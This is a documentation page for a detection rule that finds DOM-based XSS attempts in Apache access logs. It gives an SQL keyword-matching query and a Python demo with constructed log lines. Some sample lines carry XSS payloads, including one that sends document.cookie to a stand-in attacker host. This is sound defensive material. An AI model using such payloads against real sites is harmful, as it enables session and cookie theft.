turbot/tailpipe-mod-apache-access-log-detections

Detection: Cross-Site Scripting DOM Based

Overview

The DOM-Based XSS Attack detection identifies potential Cross-Site Scripting (XSS) attacks that specifically target JavaScript Document Object Model (DOM) manipulation. Unlike traditional XSS attacks that focus on server-side vulnerabilities, DOM-based XSS exploits client-side JavaScript that dynamically modifies the page's DOM.

This detection examines the request URI and the User-Agent header of each logged request for JavaScript DOM methods and properties that commonly appear in DOM-based XSS payloads: sinks such as document.write, innerHTML and outerHTML, selectors such as document.getElementById and document.querySelector, and sources such as document.location, window.location, document.URL, document.documentURI, document.referrer, window.name, location.hash, location.search and location.href. Each check is a case-insensitive substring match (ilike) against the raw logged value.

DOM-based XSS attacks are particularly dangerous because they often bypass traditional server-side XSS protections. The vulnerability occurs when client-side JavaScript code improperly handles data from untrusted sources (like URL parameters or form inputs) and uses it to modify the DOM without adequate sanitization. For example, an application might take a value from the URL and insert it into the page using innerHTML, allowing an attacker to inject malicious script.

These attacks typically target single-page applications and other sites with significant client-side functionality. Checking the User-Agent header as well as the request URI also catches attackers who place the payload in a request header rather than a query parameter, hoping that header values are logged, stored or reflected without being filtered.

Two limitations follow from the log source. First, a browser never sends the URL fragment (the part after #) to the server, so a payload delivered purely through location.hash leaves no trace in the access log; this detection can only see payloads carried in the path, the query string or the User-Agent header. Second, the match is against the raw logged string, so a payload whose keywords are percent-encoded (for example document%2Ewrite) will not match, while a legitimate request for a path that happens to contain one of these words (such as a documentation page about innerHTML) will. Review matches against the full request before treating them as confirmed attacks.

Usage

Run the detection in your terminal:

powerpipe detection run apache_access_log_detections.detection.cross_site_scripting_dom_based

Snapshot and share results via Turbot Pipes:

powerpipe login
powerpipe detection run apache_access_log_detections.detection.cross_site_scripting_dom_based --share

SQL

This detection uses a named query:

select
  tp_timestamp as timestamp,
  request_method as operation,
  request_uri as resource,
  status,
  http_user_agent as actor,
  tp_source_ip as source_ip,
  tp_id as source_id,
  -- Keep the original status and timestamp columns under new names,
  -- since the aliases above reuse those column names
  status as status_src,
  timestamp as timestamp_src,
  * exclude (status, timestamp)
from
  apache_access_log
where
  (
    request_uri is not null
    and (
      -- DOM sinks and selectors
      request_uri ilike '%document.getElementById%'
      or request_uri ilike '%document.querySelector%'
      or request_uri ilike '%document.write%'
      or request_uri ilike '%innerHTML%'
      or request_uri ilike '%outerHTML%'
      -- DOM sources (attacker-controlled inputs read by client-side code)
      or request_uri ilike '%document.location%'
      or request_uri ilike '%window.location%'
      or request_uri ilike '%document.URL%'
      or request_uri ilike '%document.documentURI%'
      or request_uri ilike '%document.referrer%'
      or request_uri ilike '%window.name%'
      or request_uri ilike '%location.hash%'
      or request_uri ilike '%location.search%'
      or request_uri ilike '%location.href%'
    )
  )
  or (
    http_user_agent is not null
    and (
      -- DOM sinks and selectors
      http_user_agent ilike '%document.getElementById%'
      or http_user_agent ilike '%document.querySelector%'
      or http_user_agent ilike '%document.write%'
      or http_user_agent ilike '%innerHTML%'
      or http_user_agent ilike '%outerHTML%'
      -- DOM sources (attacker-controlled inputs read by client-side code)
      or http_user_agent ilike '%document.location%'
      or http_user_agent ilike '%window.location%'
      or http_user_agent ilike '%document.URL%'
      or http_user_agent ilike '%document.documentURI%'
      or http_user_agent ilike '%document.referrer%'
      or http_user_agent ilike '%window.name%'
      or http_user_agent ilike '%location.hash%'
      or http_user_agent ilike '%location.search%'
      or http_user_agent ilike '%location.href%'
    )
  )
order by
  tp_timestamp desc;
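To see what the predicate above catches and misses, the following is an added Python example (not code from the mod or from Turbot) that applies the same fourteen case-insensitive substring patterns to a handful of constructed Apache combined-format log lines. The log lines, addresses and hostnames are made up for the example; the optional decode flag, which percent-decodes the URI and User-Agent before matching, is a hypothetical hardening and not something the query does.

```python
import re
from urllib.parse import unquote

# The fourteen substrings the SQL predicate tests with `ilike '%...%'`.
DOM_PATTERNS = [
    "document.getElementById", "document.querySelector", "document.write",
    "innerHTML", "outerHTML",
    "document.location", "window.location", "document.URL",
    "document.documentURI", "document.referrer", "window.name",
    "location.hash", "location.search", "location.href",
]

# Apache "combined" format:
#   host ident user [time] "method uri proto" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log; the addresses are documentation ranges, not real traffic.
SAMPLE_LOG = [
    # 1. payload in the query string, exactly the shape the rule expects
    '203.0.113.10 - - [10/Oct/2024:13:55:36 +0000] '
    '"GET /search?q=<script>document.write(document.cookie)</script> HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # 2. payload hidden in the User-Agent header, benign URI
    '198.51.100.7 - - [10/Oct/2024:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 <svg/onload=location.href=\'//attacker.example/?\'+document.cookie>"',
    # 3. same sink as (1) but percent-encoded: document%2Ewrite does not contain "document.write"
    '192.0.2.44 - - [10/Oct/2024:13:57:12 +0000] '
    '"GET /profile?name=%3Cimg%20src%3Dx%20onerror%3Ddocument%2Ewrite%28%22x%22%29%3E HTTP/1.1" '
    '200 2048 "-" "curl/8.4.0"',
    # 4. benign request
    '192.0.2.9 - - [10/Oct/2024:13:58:30 +0000] "GET /static/app.js HTTP/1.1" 304 0 '
    '"https://www.example.com/" "Mozilla/5.0"',
    # 5. benign request that still matches: the path happens to contain a sink name
    '192.0.2.9 - - [10/Oct/2024:13:59:02 +0000] "GET /docs/dom/innerHTML.html HTTP/1.1" '
    '200 8192 "-" "Mozilla/5.0"',
    # 6. what the server logs when the payload lived only in the URL fragment:
    #    the browser never sends "#<img src=x onerror=...>" to the server
    '203.0.113.10 - - [10/Oct/2024:14:00:15 +0000] "GET /app HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def first_dom_pattern(value):
    """Equivalent of `value ilike '%p%'` over DOM_PATTERNS; returns the first pattern hit."""
    if value is None:
        return None
    lowered = value.lower()
    for pattern in DOM_PATTERNS:
        if pattern.lower() in lowered:
            return pattern
    return None


def run_detection(lines, decode=False):
    """Apply the query's predicate to each line.

    `decode` is a hypothetical hardening (not part of the mod's query): percent-decode
    the URI and User-Agent before matching so encoded keywords are not missed.
    """
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count and surface these
        uri, ua = rec["uri"], rec["ua"]
        if decode:
            uri, ua = unquote(uri), unquote(ua)
        pattern = first_dom_pattern(uri) or first_dom_pattern(ua)
        if pattern:
            # field names mirror the query's aliases
            hits.append({"source_ip": rec["ip"], "resource": rec["uri"],
                         "actor": rec["ua"], "pattern": pattern})
    return hits


if __name__ == "__main__":
    for label, decode in (("raw", False), ("decoded", True)):
        print(f"--- {label} matching ---")
        for hit in run_detection(SAMPLE_LOG, decode=decode):
            print(f'{hit["source_ip"]:<14} {hit["pattern"]:<20} {hit["resource"]}')
```

Run as-is, the script reports three hits on the raw values (the literal document.write payload, the location.href payload in the User-Agent, and the false positive on /docs/dom/innerHTML.html) and four with decoding, because the percent-encoded document%2Ewrite payload only matches once decoded. The last sample line stands for a request whose payload was entirely in the fragment; the server never received it, so no log-based rule can match it.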

Tags